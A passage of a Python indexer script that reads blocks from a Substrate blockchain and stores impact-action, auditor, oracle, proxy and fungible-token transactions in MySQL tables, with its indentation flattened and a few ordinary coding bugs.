if(err.msg!="Table 'impactactionsoracles' already exists"):
print(err.msg)
else:
print("OK")
# creating impactactionsauditors table for impact actions
createactions="CREATE TABLE `impactactionsauditors` (`id` MEDIUMINT NOT NULL AUTO_INCREMENT,\
`blocknumber` INT(11) NOT NULL,\
`txhash` VARCHAR(66) NOT NULL,\
`dtblockchain` DATETIME NOT NULL,\
`signer` VARCHAR(48) NOT NULL,\
`description` VARCHAR(128) NOT NULL,\
`account` VARCHAR(48) NOT NULL,`categories` VARCHAR(128) NOT NULL,\
`area` VARCHAR(64) NOT NULL,`otherinfo` VARCHAR(66) NOT NULL, CONSTRAINT txhash_unique UNIQUE (txhash),\
PRIMARY KEY (id))"
try:
print("Creating table impactactionsauditors...")
cursor.execute(createactions)
except mysql.connector.Error as err:
if(err.msg!="Table 'impactactionsauditors' already exists"):
print(err.msg)
else:
print("OK")
# creating impactactionsproxy table for impact actions
createactions="CREATE TABLE `impactactionsproxy` (`id` MEDIUMINT NOT NULL,\
`blocknumber` INT(11) NOT NULL,\
`txhash` VARCHAR(66) NOT NULL,\
`dtblockchain` DATETIME NOT NULL,\
`signer` VARCHAR(48) NOT NULL,\
`account` VARCHAR(48) NOT NULL, CONSTRAINT txhash_unique UNIQUE (txhash),PRIMARY KEY (id))"
try:
print("Creating table impactactionsproxy...")
cursor.execute(createactions)
except mysql.connector.Error as err:
if(err.msg!="Table 'impactactionsproxy' already exists"):
print(err.msg)
else:
print("OK")
# creating impactactionsapprovalrequests table for impact actions
createactions="CREATE TABLE `impactactionsapprovalrequests` (`id` MEDIUMINT NOT NULL,\
`blocknumber` INT(11) NOT NULL,\
`txhash` VARCHAR(66) NOT NULL,\
`dtblockchain` DATETIME NOT NULL,\
`signer` VARCHAR(48) NOT NULL,\
`info` VARCHAR(8192) NOT NULL,\
`dtapproved` DATETIME,\
`dtrefused` DATETIME,\
CONSTRAINT txhash_unique UNIQUE (txhash),PRIMARY KEY (id))"
try:
print("Creating table impactactionsapprovalrequests...")
cursor.execute(createactions)
except mysql.connector.Error as err:
if(err.msg!="Table 'impactactionsapprovalrequests' already exists"):
print(err.msg)
else:
print("OK")
# creating impactactionsapprovalrequestsauditors table for impact actions
createactions="CREATE TABLE `impactactionsapprovalrequestsauditors` (`id` MEDIUMINT NOT NULL AUTO_INCREMENT,\
`blocknumber` INT(11) NOT NULL,\
`txhash` VARCHAR(66) NOT NULL,\
`dtblockchain` DATETIME NOT NULL,\
`signer` VARCHAR(48) NOT NULL,\
`approvalrequestid` int(11) NOT NULL,\
`auditor` VARCHAR(48) NOT NULL,\
`maxdays` INT(11) NOT NULL, CONSTRAINT txhash_unique UNIQUE (txhash),PRIMARY KEY (id))"
try:
print("Creating table impactactionsapprovalrequestsauditors...")
cursor.execute(createactions)
except mysql.connector.Error as err:
if(err.msg!="Table 'impactactionsapprovalrequestsauditors' already exists"):
print(err.msg)
else:
print("OK")
# creating impactactionsapprovalrequestvotes table for impact actions
createactions="CREATE TABLE `impactactionsapprovalrequestauditorvotes` (`id` MEDIUMINT NOT NULL AUTO_INCREMENT,\
`blocknumber` INT(11) NOT NULL,\
`txhash` VARCHAR(66) NOT NULL,\
`dtblockchain` DATETIME NOT NULL,\
`signer` VARCHAR(48) NOT NULL,\
`approvalrequestid` int(11) NOT NULL,\
`vote` VARCHAR(1) NOT NULL,\
`otherinfo` VARCHAR(66) NOT NULL,\
`dtrewards` DATETIME NOT NULL,\
CONSTRAINT txhash_unique UNIQUE (txhash),PRIMARY KEY (id))"
try:
print("Creating table impactactionsapprovalrequestauditorvotes...")
cursor.execute(createactions)
except mysql.connector.Error as err:
if(err.msg!="Table 'impactactionsapprovalrequestauditorvotes' already exists"):
print(err.msg)
else:
print("OK")
# creating assets table for FT
createassets="CREATE TABLE `ftassets` (`id` MEDIUMINT NOT NULL AUTO_INCREMENT,\
`blocknumber` INT(11) NOT NULL,\
`txhash` VARCHAR(66) NOT NULL,\
`dtblockchain` DATETIME NOT NULL,\
`signer` VARCHAR(48) NOT NULL,\
`assetid` int(11) NOT NULL,\
`owner` VARCHAR(48) NOT NULL,\
`maxzombies` int(11) NOT NULL,\
`minbalance` int(11) NOT NULL, CONSTRAINT txhash_unique UNIQUE (txhash),\
PRIMARY KEY (id))"
try:
print("Creating table ftassets...")
cursor.execute(createassets)
except mysql.connector.Error as err:
if(err.msg!="Table 'ftassets' already exists"):
print(err.msg)
else:
print("OK")
# creating transaction for fungible tokens
createassets="CREATE TABLE `fttransactions` (`id` MEDIUMINT NOT NULL AUTO_INCREMENT,\
`blocknumber` INT(11) NOT NULL,\
`txhash` VARCHAR(66) NOT NULL,\
`dtblockchain` DATETIME NOT NULL,\
`signer` VARCHAR(48) NOT NULL,\
`sender` VARCHAR(48) NOT NULL,\
`category` VARCHAR(20) NOT NULL,\
`assetid` int(11) NOT NULL,\
`recipient` VARCHAR(48) NOT NULL,\
`amount` int(11) NOT NULL, CONSTRAINT txhash_unique UNIQUE (txhash),\
PRIMARY KEY (id))"
try:
print("Creating table fttransactions...")
cursor.execute(createassets)
except mysql.connector.Error as err:
if(err.msg!="Table 'fttransactions' already exists"):
print(err.msg)
else:
print("OK")
#closing database
cursor.close()
cnx.close()
# function to syncronise the blockchain reading the old blocks if not yet loaded
def sync_blockchain(substrate):
# we get the the last block from the blockchain
r=substrate.rpc_request(method='chain_getHeader',params=[],result_handler=None)
rs=r.get('result')
lastblockhex=rs.get('number')
lastblocknumber=int(lastblockhex,16)
print("[Info] Last Block: ",lastblocknumber)
# we check the last block reconcilied
cnx = mysql.connector.connect(user=DB_USER, password=DB_PWD,host=DB_HOST,database=DB_NAME)
cursor = cnx.cursor(dictionary=True)
lastblocknumberverified=0
query="select * from sync limit 1"
try:
cursor.execute(query)
for row in cursor:
lastblocknumberverified=row['lastblocknumberverified']
#lastblocknumberverified=row.get('lastblocknumberverified')
except mysql.connector.Error as err:
print(err.msg)
lastblocknumberverified=0
print("[INFO] Last block number verified:",lastblocknumberverified)
# loop the new block number to find gaps and fill them in case
x=lastblocknumberverified+1
cursor.close()
cursorb = cnx.cursor()
print("[INFO] Syncing previous blocks...")
while x<=lastblocknumber:
# get block data
print("Syncing block # ",x)
# process the block of data
process_block(x)
# update sync
sqlst=""
if(lastblocknumberverified==0):
sqlst="insert into sync set lastblocknumberverified="+str(x)
else:
sqlst="update sync set lastblocknumberverified="+str(x)
try:
cursorb.execute(sqlst)
cnx.commit()
except mysql.connector.Error as err:
print(err.msg)
lastblocknumberverified=x
# increase block number
x=x+1
#end while loop
cursorb.close()
cnx.close()
# function to store a new transaction
def store_transaction(blocknumber,txhash,sender,recipient,amount,currenttime,gasfees):
cnx = mysql.connector.connect(user=DB_USER, password=DB_PWD,host=DB_HOST,database=DB_NAME)
print("Storing New Transaction")
print("TxHash: ",txhash)
print("Current time: ",currentime)
print("Sender: ",sender)
print("Recipient: ",recipient)
print("Amount: ",amount)
print("`Gas fees`: ",gasfees)
cursor = cnx.cursor()
dtblockchain=currenttime.replace("T"," ")
dtblockchain=dtblockchain[0:19]
addtx="insert into transactions set blocknumber=%s,txhash=%s,sender=%s,recipient=%s,amount=%s,gasfees=%s,dtblockchain=%s"
datatx=(blocknumber,txhash,sender,recipient,amount,gasfees,dtblockchain)
try:
cursor.execute(addtx,datatx)
except mysql.connector.Error as err:
print(err.msg)
cnx.commit()
cursor.close()
cnx.close()
# function to store Impact Actions - New Impact Action
def impactactions_newimpactaction(blocknumber,txhash,signer,currenttime,idimpactaction,data):
cnx = mysql.connector.connect(user=DB_USER, password=DB_PWD,host=DB_HOST,database=DB_NAME)
#decode json structure
j=json.loads(data)
print("Storing New Impact Action")
print("BlockNumber: ",blocknumber)
print("TxHash: ",txhash)
print("Current time: ",currenttime)
print("Signer: ",signer)
print("Id: ",idimpactaction)
print("Data: ",data)
print("Category: ",j['category'])
cursor = cnx.cursor()
dtblockchain=currenttime.replace("T"," ")
dtblockchain=dtblockchain[0:19]
addtx="insert into impactactions set blocknumber=%s,txhash=%s,signer=%s,dtblockchain=%s,id=%s"
addtx=addtx+",description=%s,category=%s,auditors=%s,blockstart=%s,blockend=%s,rewardstoken=%s,rewardsamount=%s,rewardsoracle=%s"
addtx=addtx+",rewardauditors=%s,slashingsauditors=%s,maxerrorsauditor=%s,fields=%s"
if 'fields' in j:
f=j['fields']
else:
f={}
datatx=(blocknumber,txhash,signer,dtblockchain,idimpactaction,j['description'],j['category'],j['auditors'],j['blockstart'],j['blockend'],j['rewardstoken'],j['rewardsamount'],j['rewardsoracle'],j['rewardsauditors'],j['slashingsauditors'],j['maxerrorsauditor'],json.dumps(f))
try:
cursor.execute(addtx,datatx)
except mysql.connector.Error as err:
print("[Error] ",err.msg)
cnx.commit()
cursor.close()
cnx.close()
# function to store Impact Actions - Destroy Impact Actions
def impactactions_destroyimpactaction(blocknumber,txhash,signer,currenttime,idimpactaction):
cnx = mysql.connector.connect(user=DB_USER, password=DB_PWD,host=DB_HOST,database=DB_NAME)
print("Destroy Impact Action")
print("BlockNumber: ",blocknumber)
print("TxHash: ",txhash)
print("Current time: ",currenttime)
print("Signer: ",signer)
print("Id Impact Action: ",idimpactaction)
cursor = cnx.cursor()
dtblockchain=currenttime.replace("T"," ")
dtblockchain=dtblockchain[0:19]
deltx="delete from impactactions where id=%s"
datatx=(idimpactaction,)
try:
cursor.execute(deltx,datatx)
except mysql.connector.Error as err:
print("[Error] ",err.msg)
cnx.commit()
cursor.close()
cnx.close()
# function to store Impact Actions - New Oracle
def impactactions_neworacle(blocknumber,txhash,signer,currenttime,idoracle,data):
cnx = mysql.connector.connect(user=DB_USER, password=DB_PWD,host=DB_HOST,database=DB_NAME)
#decode json structure
j=json.loads(data)
print("Storing New Oracle")
print("BlockNumber: ",blocknumber)
print("TxHash: ",txhash)
print("Current time: ",currenttime)
print("Signer: ",signer)
print("Id: ",idoracle)
print("Data: ",data)
cursor = cnx.cursor()
dtblockchain=currenttime.replace("T"," ")
dtblockchain=dtblockchain[0:19]
addtx="insert into impactactionsoracles set blocknumber=%s,txhash=%s,signer=%s,dtblockchain=%s,id=%s"
addtx=addtx+",description=%s,account=%s,otherinfo=%s"
if 'otherinfo' in j:
o=j['otherinfo']
else:
o=''
datatx=(blocknumber,txhash,signer,dtblockchain,idoracle,j['description'],j['account'],o)
try:
cursor.execute(addtx,datatx)
except mysql.connector.Error as err:
print("[Error] ",err.msg)
cnx.commit()
cursor.close()
cnx.close()
# function to store Impact Actions - Destroy Oracle
def impactactions_destroyoracle(blocknumber,txhash,signer,currenttime,idoracle):
cnx = mysql.connector.connect(user=DB_USER, password=DB_PWD,host=DB_HOST,database=DB_NAME)
print("Destroy Oracle")
print("BlockNumber: ",blocknumber)
print("TxHash: ",txhash)
print("Current time: ",currenttime)
print("Signer: ",signer)
print("Id Oracle: ",idoracle)
cursor = cnx.cursor()
dtblockchain=currenttime.replace("T"," ")
dtblockchain=dtblockchain[0:19]
deltx="delete from impactactionsoracles where id=%s"
datatx=(idoracle,)
try:
cursor.execute(deltx,datatx)
except mysql.connector.Error as err:
print("[Error] ",err.msg)
cnx.commit()
cursor.close()
cnx.close()
# function to store Impact Actions - New Approval Request
def impactactions_newapprovalrequest(blocknumber,txhash,signer,currenttime,approvalrequestid,info):
cnx = mysql.connector.connect(user=DB_USER, password=DB_PWD,host=DB_HOST,database=DB_NAME)
#decode json structure
print("Storing New Approval Request")
print("BlockNumber: ",blocknumber)
print("TxHash: ",txhash)
print("Current time: ",currenttime)
print("Signer: ",signer)
print("Id: ",approvalrequestid)
print("Info: ",info)
cursor = cnx.cursor()
dtblockchain=currenttime.replace("T"," ")
dtblockchain=dtblockchain[0:19]
addtx="insert into impactactionsapprovalrequests set blocknumber=%s,txhash=%s,signer=%s,dtblockchain=%s,id=%s,info=%s"
datatx=(blocknumber,txhash,signer,dtblockchain,approvalrequestid,info)
try:
cursor.execute(addtx,datatx)
except mysql.connector.Error as err:
print("[Error] ",err.msg)
cnx.commit()
cursor.close()
cnx.close()
# function to store Impact Actions - Vote Approval Request
def impactactions_voteapprovalrequest(blocknumber,txhash,signer,currenttime,approvalrequestid,data):
cnx = mysql.connector.connect(user=DB_USER, password=DB_PWD,host=DB_HOST,database=DB_NAME)
j=json.loads(data)
vote=j['vote']
otherinfo=j['otherinfo']
print("Storing Vote of an Approval Request")
print("BlockNumber: ",blocknumber)
print("TxHash: ",txhash)
print("Current time: ",currenttime)
print("Signer: ",signer)
print("Id Approval: ",approvalrequestid)
print("Vote: ",vote)
print("Other Info: ",otherinfo)
cursor = cnx.cursor()
dtblockchain=currenttime.replace("T"," ")
dtblockchain=dtblockchain[0:19]
addtx="insert into impactactionsapprovalrequestauditorvotes set blocknumber=%s,txhash=%s,signer=%s,dtblockchain=%s,approvalrequestid=%s,vote=%s,otherinfo=%s"
datatx=(blocknumber,txhash,signer,dtblockchain,approvalrequestid,vote,otherinfo)
try:
cursor.execute(addtx,datatx)
except mysql.connector.Error as err:
print("[Error] ",err.msg)
cnx.commit()
cursor.close()
cnx.close()
# function to store Impact Actions - Assign Auditor to Approval Request
def impactactions_assignauditorapprovalrequest(blocknumber,txhash,signer,currenttime,approvalrequestid,auditor,maxdays):
cnx = mysql.connector.connect(user=DB_USER, password=DB_PWD,host=DB_HOST,database=DB_NAME)
#decode json structure
print("Storing Assigned Auditor for an Approval Request")
print("BlockNumber: ",blocknumber)
print("TxHash: ",txhash)
print("Current time: ",currenttime)
print("Signer: ",signer)
print("Approval Request Id: ",approvalrequestid)
print("Auditor: ",auditor)
print("Max days: ",maxdays)
cursor = cnx.cursor()
dtblockchain=currenttime.replace("T"," ")
dtblockchain=dtblockchain[0:19]
addtx="insert into impactactionsapprovalrequestsauditors set blocknumber=%s,txhash=%s,signer=%s,dtblockchain=%s,approvalrequestid=%s,auditor=%s,maxdays=%s"
datatx=(blocknumber,txhash,signer,dtblockchain,approvalrequestid,auditor,maxdays)
try:
cursor.execute(addtx,datatx)
except mysql.connector.Error as err:
print("[Error] ",err.msg)
cnx.commit()
cursor.close()
cnx.close()
# function to store Impact Actions - Destroy Auditor
def impactactions_destory_assignedauditorapprovalrequest(blocknumber,txhash,signer,currenttime,approvalrequestid,auditor):
cnx = mysql.connector.connect(user=DB_USER, password=DB_PWD,host=DB_HOST,database=DB_NAME)
print("Destroy Assigned Auditor to an Approval Request")
print("BlockNumber: ",blocknumber)
print("TxHash: ",txhash)
print("Current time: ",currenttime)
print("Signer: ",signer)
print("Approval Request id: ",approvalrequestid)
print("Auditor: ",auditor)
cursor = cnx.cursor()
dtblockchain=currenttime.replace("T"," ")
dtblockchain=dtblockchain[0:19]
deltx="delete from impactactionsapprovalrequestsauditors where approvalrequestid=%s and auditor=%s"
datatx=(approvalrequestid,auditor)
try:
cursor.execute(deltx,datatx)
except mysql.connector.Error as err:
print("[Error] ",err.msg)
cnx.commit()
cursor.close()
cnx.close()
# function to store Impact Actions - New Auditor
def impactactions_newauditor(blocknumber,txhash,signer,currenttime,account,data):
cnx = mysql.connector.connect(user=DB_USER, password=DB_PWD,host=DB_HOST,database=DB_NAME)
#decode json structure
j=json.loads(data)
print("Storing New Auditor")
print("BlockNumber: ",blocknumber)
print("TxHash: ",txhash)
print("Current time: ",currenttime)
print("Signer: ",signer)
print("Account: ",account)
print("Data: ",data)
cursor = cnx.cursor()
dtblockchain=currenttime.replace("T"," ")
dtblockchain=dtblockchain[0:19]
addtx="insert into impactactionsauditors set blocknumber=%s,txhash=%s,signer=%s,dtblockchain=%s"
addtx=addtx+",description=%s,account=%s,categories=%s,area=%s,otherinfo=%s"
if 'otherinfo' in j:
o=j['otherinfo']
else:
o=''
datatx=(blocknumber,txhash,signer,dtblockchain,j['description'],account,json.dumps(j['categories']),j['area'],o)
try:
cursor.execute(addtx,datatx)
except mysql.connector.Error as err:
print("[Error] ",err.msg)
cnx.commit()
cursor.close()
cnx.close()
# function to store Impact Actions - Destroy Auditor
def impactactions_destroyauditor(blocknumber,txhash,signer,currenttime,account):
cnx = mysql.connector.connect(user=DB_USER, password=DB_PWD,host=DB_HOST,database=DB_NAME)
print("Destroy Auditor")
print("BlockNumber: ",blocknumber)
print("TxHash: ",txhash)
print("Current time: ",currenttime)
print("Signer: ",signer)
print("account: ",account)
cursor = cnx.cursor()
dtblockchain=currenttime.replace("T"," ")
dtblockchain=dtblockchain[0:19]
deltx="delete from impactactionsauditors where account=%s"
datatx=(account,)
try:
cursor.execute(deltx,datatx)
except mysql.connector.Error as err:
print("[Error] ",err.msg)
cnx.commit()
cursor.close()
cnx.close()
# function to store Impact Actions - New Proxy
def impactactions_newproxy(blocknumber,txhash,signer,currenttime,idproxy, account):
cnx = mysql.connector.connect(user=DB_USER, password=DB_PWD,host=DB_HOST,database=DB_NAME)
print("Storing New Proxy")
print("BlockNumber: ",blocknumber)
print("TxHash: ",txhash)
print("Current time: ",currenttime)
print("Signer: ",signer)
print("Account: ",account)
cursor = cnx.cursor()
dtblockchain=currenttime.replace("T"," ")
dtblockchain=dtblockchain[0:19]
addtx="insert into impactactionsproxy set blocknumber=%s,txhash=%s,signer=%s,dtblockchain=%s"
addtx=addtx+",id=%s,account=%s"
datatx=(blocknumber,txhash,signer,dtblockchain,idproxy,account)
try:
cursor.execute(addtx,datatx)
except mysql.connector.Error as err:
print("[Error] ",err.msg)
cnx.commit()
cursor.close()
cnx.close()
# function to store Impact Actions - Destroy Proxy
def impactactions_destroyproxy(blocknumber,txhash,signer,currenttime,idproxy):
cnx = mysql.connector.connect(user=DB_USER, password=DB_PWD,host=DB_HOST,database=DB_NAME)
print("Destroy Proxy")
print("BlockNumber: ",blocknumber)
print("TxHash: ",txhash)
print("Current time: ",currenttime)
print("Signer: ",signer)
print("id Proxy: ",idproxy)
cursor = cnx.cursor()
dtblockchain=currenttime.replace("T"," ")
dtblockchain=dtblockchain[0:19]
deltx="delete from impactactionsproxy where id=%s"
datatx=(idproxy,)
try:
cursor.execute(deltx,datatx)
except mysql.connector.Error as err:
print("[Error] ",err.msg)
cnx.commit()
cursor.close()
cnx.close()
# function to store Impact Actions - New Category
def impactactions_newcategory(blocknumber,txhash,signer,currenttime,idcategory,description):
cnx = mysql.connector.connect(user=DB_USER, password=DB_PWD,host=DB_HOST,database=DB_NAME)
print("Storing New Category")
print("BlockNumber: ",blocknumber)
print("TxHash: ",txhash)
print("Current time: ",currenttime)
print("Signer: ",signer)
print("Id category: ",idcategory)
print("Description: ",description)
cursor = cnx.cursor()
dtblockchain=currenttime.replace("T"," ")
dtblockchain=dtblockchain[0:19]
addtx="insert into impactactionscategories set blocknumber=%s,txhash=%s,signer=%s,dtblockchain=%s,id=%s,description=%s"
datatx=(blocknumber,txhash,signer,dtblockchain,idcategory,description)
try:
cursor.execute(addtx,datatx)
except mysql.connector.Error as err:
print("[Error] ",err.msg)
cnx.commit()
cursor.close()
cnx.close()
# function to store Impact Actions - Destroy Category
def impactactions_destroycategory(blocknumber,txhash,signer,currenttime,idcategory):
cnx = mysql.connector.connect(user=DB_USER, password=DB_PWD,host=DB_HOST,database=DB_NAME)
print("Destroy Category")
print("BlockNumber: ",blocknumber)
print("TxHash: ",txhash)
print("Current time: ",currenttime)
print("Signer: ",signer)
print("Id category: ",idcategory)
cursor = cnx.cursor()
dtblockchain=currenttime.replace("T"," ")
dtblockchain=dtblockchain[0:19]
deltx="delete from impactactionscategories where id=%s"
datatx=(idcategory,)
try:
cursor.execute(deltx,datatx)
except mysql.connector.Error as err:
print("[Error] ",err.msg)
cnx.commit()
cursor.close()
cnx.close()
# function to create new asset from Sudo
def assets_force_create(blocknumber,txhash,signer,currenttime,assetid,owner,maxzombies,minbalance):
cnx = mysql.connector.connect(user=DB_USER, password=DB_PWD,host=DB_HOST,database=DB_NAME)
print("Create Asset (Fungible Tokens)")
print("BlockNumber: ",blocknumber)
print("TxHash: ",txhash)
print("Current time: ",currenttime)
print("Signer: ",signer)
print("Asset Id : ",assetid)
print("Owner : ",owner)
print("Max Zombies : ",maxzombies)
print("Min Balance : ",minbalance)
cursor = cnx.cursor()
dtblockchain=currenttime.replace("T"," ")
dtblockchain=dtblockchain[0:19]
addtx="insert into ftassets set blocknumber=%s,txhash=%s,signer=%s,assetid=%s,owner=%s,maxzombies=%s,minbalance=%s,dtblockchain=%s"
datatx=(blocknumber,txhash,signer,assetid,owner,maxzombies,minbalance,dtblockchain)
try:
cursor.execute(addtx,datatx)
except mysql.connector.Error as err:
print("[Error] ",err.msg)
cnx.commit()
cursor.close()
cnx.close()
# function to mint assets in favor of an account
def assets_mint(blocknumber,txhash,signer,currenttime,assetid,recipient,amount):
cnx = mysql.connector.connect(user=DB_USER, password=DB_PWD,host=DB_HOST,database=DB_NAME)
category="Minted"
print("Mint Assets (Fungible Tokens)")
print("BlockNumber: ",blocknumber)
print("TxHash: ",txhash)
print("Current time: ",currenttime)
print("Signer: ",signer)
print("Asset Id : ",assetid)
print("Recipient : ",recipient)
print("Amount : ",amount)
cursor = cnx.cursor()
dtblockchain=currenttime.replace("T"," ")
dtblockchain=dtblockchain[0:19]
addtx="insert into fttransactions set blocknumber=%s,txhash=%s,signer=%s,sender=%s,category=%s,assetid=%s,recipient=%s,amount=%s,dtblockchain=%s"
datatx=(blocknumber,txhash,signer,signer,category,assetid,recipient,amount,dtblockchain)
try:
cursor.execute(addtx,datatx)
except mysql.connector.Error as err:
print("[Error] ",err.msg)
cnx.commit()
cursor.close()
cnx.close()
# function to burn assets decrease the balance of an account
def assets_burn(blocknumber,txhash,signer,currenttime,assetid,recipient,amount):
cnx = mysql.connector.connect(user=DB_USER, password=DB_PWD,host=DB_HOST,database=DB_NAME)
category="Burned"
print("Burn Assets (Fungible Tokens)")
print("BlockNumber: ",blocknumber)
print("TxHash: ",txhash)
print("Current time: ",currenttime)
print("Signer: ",signer)
print("Asset Id : ",assetid)
print("Recipient : ",recipient)
print("Amount : ",amount)
cursor = cnx.cursor()
dtblockchain=currenttime.replace("T"," ")
dtblockchain=dtblockchain[0:19]
addtx="insert into fttransactions set blocknumber=%s,txhash=%s,signer=%s,sender=%s,category=%s,assetid=%s,recipient=%s,amount=%s,dtblockchain=%s"
datatx=(blocknumber,txhash,signer,signer,category,assetid,recipient,amount,dtblockchain)
try:
cursor.execute(addtx,datatx)
except mysql.connector.Error as err:
print("[Error] ",err.msg)
cnx.commit()
cursor.close()
cnx.close()
# function to transfer assets in favor of an account
def assets_transfer(blocknumber,txhash,signer,currenttime,assetid,recipient,amount):
cnx = mysql.connector.connect(user=DB_USER, password=DB_PWD,host=DB_HOST,database=DB_NAME)
category="Transfer"
print("Mint Assets (Fungible Tokens)")
print("BlockNumber: ",blocknumber)
print("TxHash: ",txhash)
print("Current time: ",currenttime)
print("Signer: ",signer)
print("Asset Id : ",assetid)
print("Recipient : ",recipient)
print("Amount : ",amount)
cursor = cnx.cursor()
dtblockchain=currenttime.replace("T"," ")
dtblockchain=dtblockchain[0:19]
addtx="insert into fttransactions set blocknumber=%s,txhash=%s,signer=%s,sender=%s,category=%s,assetid=%s,recipient=%s,amount=%s,dtblockchain=%s"
datatx=(blocknumber,txhash,signer,signer,category,assetid,recipient,amount,dtblockchain)
try:
cursor.execute(addtx,datatx)
except mysql.connector.Error as err:
print("[Error] ",err.msg)
cnx.commit()
cursor.close()
cnx.close()
# function to force transfer assets in favor of an account
def assets_forcetransfer(blocknumber,txhash,signer,sender,currenttime,assetid,recipient,amount):
cnx = mysql.connector.connect(user=DB_USER, password=DB_PWD,host=DB_HOST,database=DB_NAME)
category="Transfer"
print("Mint Assets (Fungible Tokens)")
print("BlockNumber: ",blocknumber)
print("TxHash: ",txhash)
print("Current time: ",currenttime)
print("Signer: ",signer)
print("Asset Id : ",assetid)
print("Recipient : ",recipient)
print("Amount : ",amount)
cursor = cnx.cursor()
dtblockchain=currenttime.replace("T"," ")
dtblockchain=dtblockchain[0:19]
addtx="insert into fttransactions set blocknumber=%s,txhash=%s,signer=%s,sender=%s,category=%s,assetid=%s,recipient=%s,amount=%s,dtblockchain=%s"
datatx=(blocknumber,txhash,signer,signer,category,assetid,recipient,amount,dtblockchain)
try:
cursor.execute(addtx,datatx)
except mysql.connector.Error as err:
print("[Error] ",err.msg)
cnx.commit()
cursor.close()
cnx.close()
# function to destroy asset (Fungible Tokens) from Sudo
def assets_force_destroy(blocknumber,txhash,signer,currenttime,assetid,witnesszombies):
cnx = mysql.connector.connect(user=DB_USER, password=DB_PWD,host=DB_HOST,database=DB_NAME)
print("Destroy Asset (Fungible Tokens)")
print("BlockNumber: ",blocknumber)
print("TxHash: ",txhash)
print("Current time: ",currenttime)
print("Signer: ",signer)
print("Asset Id: ",assetid)
print("Witnesses Zombies: ",witnesszombies)
cursor = cnx.cursor()
dtblockchain=currenttime.replace("T"," ")
dtblockchain=dtblockchain[0:19]
deltx="delete from ftassets where assetid=%s"
datatx=(assetid,)
try:
cursor.execute(deltx,datatx)
except mysql.connector.Error as err:
print("[Error] ",err.msg)
cnx.commit()
cursor.close()
cnx.close()
# function to process a block of data
def process_block(blocknumber):
# Retrieve extrinsics in block
print("Processing Block # ",blocknumber)
result = substrate.get_block(block_number=blocknumber)
print ("##########################")
print(result)
print("Block Hash: ",result['header']['hash'])
blockhash=result['header']['hash']
print ("##########################")
events=substrate.get_events(result['header']['hash'])
print ("#######EVENTS##############")
print(events)
print ("##########################")
# retrieve receipt
cnt=0
for extrinsic in result['extrinsics']:
if extrinsic.address:
signed_by_address = extrinsic.address.value
else:
signed_by_address = None
print('\nPallet: {}\nCall: {}\nSigned by: {}'.format(
extrinsic.call_module.name,
extrinsic.call.name,
signed_by_address
))
# check for exstrinc success or not
try:
error=events[cnt].params[0]['value'].get('Error')
except:
error=None
if events[cnt].event.name=="ExtrinsicFailed" or error!=None :
print("Extrinsic has failed")
cnt=cnt+1
continue
else:
print("Extrinsic succeded: ",events[cnt].event.name)
print("extrinsic.extrinsic_hash: ",extrinsic.extrinsic_hash)
print("extrinsic: ",extrinsic)
print("blockhash: ",blockhash)
gasfees=0
if (extrinsic.extrinsic_hash!=None):
# get receipt of the extrisinc
receipt = ExtrinsicReceipt(
substrate=substrate,
extrinsic_hash=extrinsic.extrinsic_hash,
block_hash=blockhash
)
print("************RECEIPT**************")
print("blockhash: ",blockhash)
print("extrinsic.extrinsic_hash: ",extrinsic.extrinsic_hash)
print("receipt.total_fee_amount: ",receipt.total_fee_amount)
print(receipt.is_success)
print(receipt.extrinsic.call_module.name)
print(receipt.extrinsic.call.name)
print(receipt.weight)
print("*********************************")
gasfees=receipt.total_fee_amount
#for TimeStamp call we set the time of the following transactions
if extrinsic.call_module.name=="Timestamp" and extrinsic.call.name=="set":
currentime=extrinsic.params[0]['value']
#Balance Transfer we update the transactions
if extrinsic.call_module.name=="Balances" and ( extrinsic.call.name=="transfer" or extrinsic.call.name=="transfer_keep_alive"):
## store the transaction in the database
store_transaction(blocknumber,'0x'+extrinsic.extrinsic_hash,extrinsic.address.value,extrinsic.params[0]['value'],extrinsic.params[1]['value'],currentime,gasfees)
#Impact Actions - Vote Approval Request
if extrinsic.call_module.name=="ImpactActions" and extrinsic.call.name=="vote_approval_request":
impactactions_voteapprovalrequest(blocknumber,'0x'+extrinsic.extrinsic_hash,extrinsic.address.value,currentime,extrinsic.params[0]['value'],extrinsic.params[1]['value'])
#Impact Actions - Vote Approval Request
if extrinsic.call_module.name=="ImpactActions" and extrinsic.call.name=="request_approval":
impactactions_newapprovalrequest(blocknumber,'0x'+extrinsic.extrinsic_hash,extrinsic.address.value,currentime,extrinsic.params[0]['value'],extrinsic.params[1]['value'])
#Impact Actions - Assign Auditor to Approval Request
if extrinsic.call_module.name=="ImpactActions" and extrinsic.call.name=="assign_auditor":
impactactions_assignauditorapprovalrequest(blocknumber,'0x'+extrinsic.extrinsic_hash,extrinsic.address.value,currentime,extrinsic.params[0]['value'],extrinsic.params[1]['value'],extrinsic.params[2]['value'])
#Impact Actions - Remove Assigned Auditor to Approval Request
if extrinsic.call_module.name=="ImpactActions" and extrinsic.call.name=="destroy_assigned_auditor":
impactactions_destory_assignedauditorapprovalrequest(blocknumber,'0x'+extrinsic.extrinsic_hash,extrinsic.address.value,currentime,extrinsic.params[0]['value'],extrinsic.params[1]['value'])
#Assets - Create new asset as regular user
if extrinsic.call_module.name=="Assets" and extrinsic.call.name=="create":
assets_force_create(blocknumber,'0x'+extrinsic.extrinsic_hash,extrinsic.address.value,currentime,extrinsic.params[0]['value'],extrinsic.params[1]['value'],extrinsic.params[2]['value'],extrinsic.params[3]['value'])
#Assets - Destroy asset as regular user
if extrinsic.call_module.name=="Assets" and extrinsic.call.name=="destroy":
assets_force_destroy(blocknumber,'0x'+extrinsic.extrinsic_hash,extrinsic.address.value,currentime,extrinsic.params[0]['value'],extrinsic.params[1]['value'])
#Assets - Mint assets in favor of an account
if extrinsic.call_module.name=="Assets" and extrinsic.call.name=="mint":
assets_mint(blocknumber,'0x'+extrinsic.extrinsic_hash,extrinsic.address.value,currentime,extrinsic.params[0]['value'],extrinsic.params[1]['value'],extrinsic.params[2]['value'])
#Assets - Burn assets decreasing the balance of an account
if extrinsic.call_module.name=="Assets" and extrinsic.call.name=="burn":
assets_burn(blocknumber,'0x'+extrinsic.extrinsic_hash,extrinsic.address.value,currentime,extrinsic.params[0]['value'],extrinsic.params[1]['value'],extrinsic.params[2]['value'])
#Assets - Transfer assets in favor of an account
if extrinsic.call_module.name=="Assets" and extrinsic.call.name=="transfer":
assets_transfer(blocknumber,'0x'+extrinsic.extrinsic_hash,extrinsic.address.value,currentime,extrinsic.params[0]['value'],extrinsic.params[1]['value'],extrinsic.params[2]['value'])
# Sudo Calls
if extrinsic.call_module.name=="Sudo" and extrinsic.call.name=="sudo":
